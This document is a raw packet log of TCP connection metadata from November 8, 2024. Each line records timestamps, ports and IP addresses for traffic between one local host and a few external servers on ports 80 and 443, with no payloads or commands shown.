Nov 8, 2024 16:15:27.688397884 CET	49718	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.688407898 CET	443	49718	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.688602924 CET	49718	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.688695908 CET	49718	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.688704967 CET	443	49718	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.767343044 CET	49711	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.035430908 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.040317059 CET	80	49719	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:28.040405035 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.040829897 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.046817064 CET	80	49719	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:28.292227030 CET	443	49715	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:28.294759989 CET	49715	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:28.294778109 CET	443	49715	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:28.411926985 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.412462950 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.412497044 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.412952900 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.412957907 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.415134907 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.415477037 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.415489912 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.415858030 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.415863037 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.417481899 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.417781115 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.417803049 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.418114901 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.418119907 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.420250893 CET	443	49718	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.420548916 CET	49718	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.420568943 CET	443	49718	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.420876026 CET	49718	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.420882940 CET	443	49718	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.433861017 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.434390068 CET	49714	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.434417009 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.434876919 CET	49714	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.434883118 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.443181038 CET	443	49715	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:28.443305016 CET	443	49715	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:28.443443060 CET	49715	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:28.443978071 CET	49715	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:28.446882963 CET	49711	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.448112011 CET	49720	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.453449011 CET	80	49720	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:28.453504086 CET	80	49711	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:28.453521013 CET	49720	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.453552008 CET	49711	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.453608990 CET	49720	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.458749056 CET	80	49720	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:28.546994925 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547018051 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547074080 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547075987 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547118902 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547285080 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547310114 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547352076 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547369003 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547422886 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547441959 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547458887 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547461987 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547498941 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547507048 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547548056 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547566891 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547580957 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547590971 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547595978 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547662973 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547703981 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547755003 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547764063 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547781944 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.547786951 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.547789097 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.549285889 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.549298048 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.549324989 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.549329996 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.550404072 CET	443	49718	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.550801992 CET	443	49718	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.550842047 CET	49718	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.551422119 CET	49718	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.551428080 CET	443	49718	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.552571058 CET	49721	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.552604914 CET	443	49721	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.552997112 CET	49721	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.553839922 CET	49722	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.553879023 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.553950071 CET	49722	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.554500103 CET	49723	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.554524899 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.554621935 CET	49723	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.555999041 CET	49721	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.556009054 CET	443	49721	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.556109905 CET	49722	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.556138039 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.556495905 CET	49723	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.556509972 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.557729959 CET	49724	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.557751894 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.557885885 CET	49724	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.557996035 CET	49724	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.558008909 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.565737963 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.565943003 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.566024065 CET	49714	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.566070080 CET	49714	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.566091061 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.566107035 CET	49714	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.566112995 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.568738937 CET	49725	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.568773031 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.569013119 CET	49725	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.569161892 CET	49725	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:28.569174051 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:28.682195902 CET	80	49719	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:28.685718060 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:28.690584898 CET	80	49719	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:28.831724882 CET	80	49719	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:28.871630907 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:28.871670008 CET	443	49726	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:28.872198105 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:28.877290964 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:28.877304077 CET	443	49726	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:28.908174992 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:29.092767000 CET	80	49720	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:29.094360113 CET	49727	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:29.094430923 CET	443	49727	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.094829082 CET	49727	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:29.094829082 CET	49727	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:29.094871044 CET	443	49727	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.283165932 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.284198999 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.288793087 CET	49722	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.288806915 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.288944006 CET	443	49721	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.289230108 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.289510012 CET	49722	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.289515018 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.290004015 CET	49723	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.290025949 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.290445089 CET	49723	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.290448904 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.291059971 CET	49721	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.291068077 CET	443	49721	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.291503906 CET	49721	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.291512966 CET	443	49721	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.296610117 CET	49725	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.296624899 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.297023058 CET	49725	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.297029972 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.298938036 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.300120115 CET	49724	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.300127983 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.300715923 CET	49724	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.300720930 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.306257010 CET	80	49720	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:29.306360006 CET	49720	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:29.414319038 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.414344072 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.414499044 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.414551020 CET	49722	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.414674044 CET	49722	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.414690018 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.414701939 CET	49722	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.414707899 CET	443	49722	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.415136099 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.415180922 CET	49723	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.416507006 CET	49723	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.416518927 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.416538954 CET	49723	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.416543961 CET	443	49723	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.418816090 CET	443	49721	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.419194937 CET	443	49721	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.419250011 CET	49721	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.420037985 CET	49728	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.420061111 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.420161009 CET	49728	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.420924902 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.420990944 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.421120882 CET	49725	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.421597004 CET	49729	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.421611071 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.421659946 CET	49729	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.422045946 CET	49721	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.422054052 CET	443	49721	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.425822020 CET	49730	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.425822020 CET	49728	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.425837040 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.425852060 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.425895929 CET	49730	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.425991058 CET	49725	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.425997019 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.426074982 CET	49725	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.426079035 CET	443	49725	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.426879883 CET	49729	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.426897049 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.427133083 CET	49730	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.427140951 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.428440094 CET	49731	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.428451061 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.428602934 CET	49731	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.428776979 CET	49731	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.428795099 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.445858002 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.445918083 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.445970058 CET	49724	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.446186066 CET	49724	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.446196079 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.446223021 CET	49724	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.446228027 CET	443	49724	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.448393106 CET	49732	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.448426008 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.448590040 CET	49732	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.448805094 CET	49732	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:29.448815107 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:29.485866070 CET	443	49726	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.485943079 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:29.488285065 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:29.488292933 CET	443	49726	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.488579035 CET	443	49726	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.533174992 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:29.781425953 CET	443	49727	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.816754103 CET	49727	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:29.816808939 CET	443	49727	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.970750093 CET	443	49727	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.970846891 CET	443	49727	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:29.970928907 CET	49727	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:29.974698067 CET	49727	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.024385929 CET	49733	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:30.029292107 CET	80	49733	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:30.029397011 CET	49733	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:30.029519081 CET	49733	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:30.034353018 CET	80	49733	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:30.060031891 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.107326984 CET	443	49726	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:30.142895937 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.143874884 CET	49728	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.143923044 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.144675016 CET	49728	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.144681931 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.154699087 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.156644106 CET	49730	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.156666040 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.156889915 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.157294989 CET	49730	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.157299042 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.157465935 CET	49731	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.157493114 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.157942057 CET	49731	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.157947063 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.184268951 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.184792042 CET	49732	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.184809923 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.185327053 CET	49732	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.185338020 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.191585064 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.192018032 CET	49729	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.192040920 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.192462921 CET	49729	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.192468882 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.200911999 CET	443	49726	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:30.201009035 CET	443	49726	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:30.201065063 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.208040953 CET	49726	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.212970018 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:30.217885971 CET	80	49719	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:30.269998074 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.270068884 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.270240068 CET	49728	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.270445108 CET	49728	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.270469904 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.270487070 CET	49728	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.270492077 CET	443	49728	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.274446011 CET	49734	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.274472952 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.274530888 CET	49734	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.274818897 CET	49734	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.274837017 CET	443	49734	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.284403086 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.284521103 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.284607887 CET	49730	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.284823895 CET	49730	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.284837961 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.284848928 CET	49730	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.284853935 CET	443	49730	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.288135052 CET	49735	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.288171053 CET	443	49735	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.288233042 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.288307905 CET	49735	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.288578987 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.288629055 CET	49731	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.288631916 CET	49735	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.288642883 CET	443	49735	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.288752079 CET	49731	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.288777113 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.288795948 CET	49731	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.288801908 CET	443	49731	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.291238070 CET	49736	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.291282892 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.291383028 CET	49736	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.291656971 CET	49736	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.291666985 CET	443	49736	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.314004898 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.314104080 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.314239025 CET	49732	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.314409971 CET	49732	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.314426899 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.314480066 CET	49732	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.314487934 CET	443	49732	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.317437887 CET	49737	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.317490101 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.317548037 CET	49737	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.317897081 CET	49737	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.317909002 CET	443	49737	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.327547073 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.327625990 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.327677965 CET	49729	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.327869892 CET	49729	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.327894926 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.327910900 CET	49729	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.327918053 CET	443	49729	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.331732988 CET	49738	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.331778049 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.331841946 CET	49738	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.332098007 CET	49738	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:30.332108021 CET	443	49738	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:30.360656023 CET	80	49719	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:30.363429070 CET	49739	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.363496065 CET	443	49739	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:30.363626003 CET	49739	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.364006996 CET	49739	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:30.364022017 CET	443	49739	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:30.408169031 CET	49719	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:30.681972027 CET	80	49733	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:30.683247089 CET	49740	443	192.168.2.10	188.114.96.3
